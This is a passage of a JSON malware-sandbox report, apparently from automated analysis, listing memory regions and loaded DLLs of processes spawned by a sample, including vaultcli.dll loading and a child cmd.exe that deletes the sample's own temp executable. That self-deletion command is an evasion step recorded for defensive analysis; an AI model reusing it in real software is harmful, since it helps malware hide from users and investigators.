1850802176, "type": "region", "version": 1 }, "end_va": 1851006975, "entry_point": 1850802176, "filename": "\\Windows\\System32\\winmm.dll", "id": "region_1779", "name": "winmm.dll", "norm_filename": "c:\\windows\\system32\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1850802176, "timestamp": "00:01:47.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1915355136, "type": "region", "version": 1 }, "end_va": 1915383807, "entry_point": 1915355136, "filename": "\\Windows\\System32\\wsock32.dll", "id": "region_1780", "name": "wsock32.dll", "norm_filename": "c:\\windows\\system32\\wsock32.dll", "region_type": "memory_mapped_file", "start_va": 1915355136, "timestamp": "00:01:47.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997557759, "entry_point": 1997340672, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1781", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:01:47.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1997103103, "entry_point": 1997078528, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1782", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:47.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 782336, "start_va": 1895497728, "type": "region", "version": 1 }, "end_va": 1896280063, "entry_point": 1895497728, "filename": "\\Windows\\System32\\msvcr100.dll", "id": "region_1783", "name": "msvcr100.dll", "norm_filename": "c:\\windows\\system32\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1895497728, "timestamp": "00:01:47.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1915355136, "type": "region", "version": 1 }, "end_va": 1915404287, "entry_point": 1915355136, "filename": "\\Windows\\System32\\vaultcli.dll", "id": "region_1784", "name": "vaultcli.dll", "norm_filename": "c:\\windows\\system32\\vaultcli.dll", "region_type": "memory_mapped_file", "start_va": 1915355136, "timestamp": "00:01:47.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1638400, "start_va": 1943470080, "type": "region", "version": 1 }, "end_va": 1945108479, "entry_point": 1943470080, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll", "id": "region_1785", "name": "gdiplus.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll", "region_type": "memory_mapped_file", "start_va": 1943470080, "timestamp": "00:01:47.848", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 917504, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 39518207, "entry_point": 0, "filename": null, "id": "region_1786", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:47.891", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_1787", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:47.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7405567, "entry_point": 0, "filename": null, "id": "region_1788", "name": "private_0x00000000006d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7143424, "timestamp": "00:01:47.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7405568, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 0, "filename": null, "id": "region_1789", "name": "private_0x0000000000710000", "norm_filename": null, "region_type": "private_memory", "start_va": 7405568, "timestamp": "00:01:47.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 5185536, "start_va": 44695552, "type": "region", "version": 1 }, "end_va": 49881087, "entry_point": 0, "filename": null, "id": "region_1790", "name": "private_0x0000000002aa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44695552, "timestamp": "00:01:47.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_1791", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:01:47.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1940520960, "type": "region", "version": 1 }, "end_va": 1941549055, "entry_point": 1940520960, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_1792", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1940520960, "timestamp": "00:01:47.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4853759, "entry_point": 0, "filename": null, "id": "region_1793", "name": "private_0x00000000004a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4849664, "timestamp": "00:01:47.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 6426623, "entry_point": 0, "filename": null, "id": "region_1794", "name": "private_0x0000000000620000", "norm_filename": null, "region_type": "private_memory", "start_va": 6422528, "timestamp": "00:01:47.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 39518208, "type": "region", "version": 1 }, "end_va": 40566783, "entry_point": 0, "filename": null, "id": "region_1795", "name": "private_0x00000000025b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39518208, "timestamp": "00:01:47.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 39649279, "entry_point": 0, "filename": null, "id": "region_1796", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:01:48.019", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "/c del \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_9", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 9, "origin_monitor_id": 8, "ref_parent_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000009-region_00001507-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1507", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1508", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1509", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001510-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1510", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1244463104, "type": "region", "version": 1 }, "end_va": 1244774399, "entry_point": 1244463104, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_1511", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1244463104, "timestamp": "00:01:11.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1512", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1513", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1514", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001515-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1515", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001516-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_225", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1516", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:11.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1517", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:11.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1518", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:11.279", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001519-addr_0x0000000000070000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_226", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1519", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:11.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2977791, "entry_point": 2555904, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1520", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:01:11.279", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001521-addr_0x0000000000300000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_227", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_1521", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:11.280", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1863974912, "type": "region", "version": 1 }, "end_va": 1864003583, "entry_point": 1863974912, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_1522", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1863974912, "timestamp": "00:01:11.280", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1523", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1524", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1525", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1526", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1527", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1528", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1529", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1530", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:11.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4030463, "entry_point": 0, "filename": null, "id": "region_1531", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:01:11.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1532", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:01:11.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1533", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:11.284", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_1534", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:11.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1535", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:11.305", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001536-addr_0x00000000002e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_228", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3018751, "entry_point": 0, "filename": null, "id": "region_1536", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:01:11.305", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001537-addr_0x00000000002f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_229", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3084287, "entry_point": 0, "filename": null, "id": "region_1537", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:11.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 5115903, "entry_point": 0, "filename": null, "id": "region_1538", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:11.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 17760255, "entry_point": 0, "filename": null, "id": "region_1539", "name": "pagefile_0x00000000004f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5177344, "timestamp": "00:01:11.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 17760256, "type": "region", "version": 1 }, "end_va": 19214335, "entry_point": 0, "filename": null, "id": "region_1540", "name": "pagefile_0x00000000010f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 17760256, "timestamp": "00:01:11.306", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Program Files\\Mozilla Firefox\\Firefox.exe\"", "filename": "c:\\program files\\mozilla firefox\\firefox.exe", "id": "proc_11", "image_name": "firefox.exe", "monitor_reason": "child_process", "monitored_id": 11, "origin_monitor_id": 8, "ref_parent_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1797", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1798", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 274431, "entry_point": 0, "filename": null, "id": "region_1799", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_1800", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 10240000, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 12271615, "entry_point": 0, "filename": null, "id": "region_1801", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1089536, "start_va": 12320768, "type": "region", "version": 1 }, "end_va": 13410303, "entry_point": 0, "filename": null, "id": "region_1802", "name": 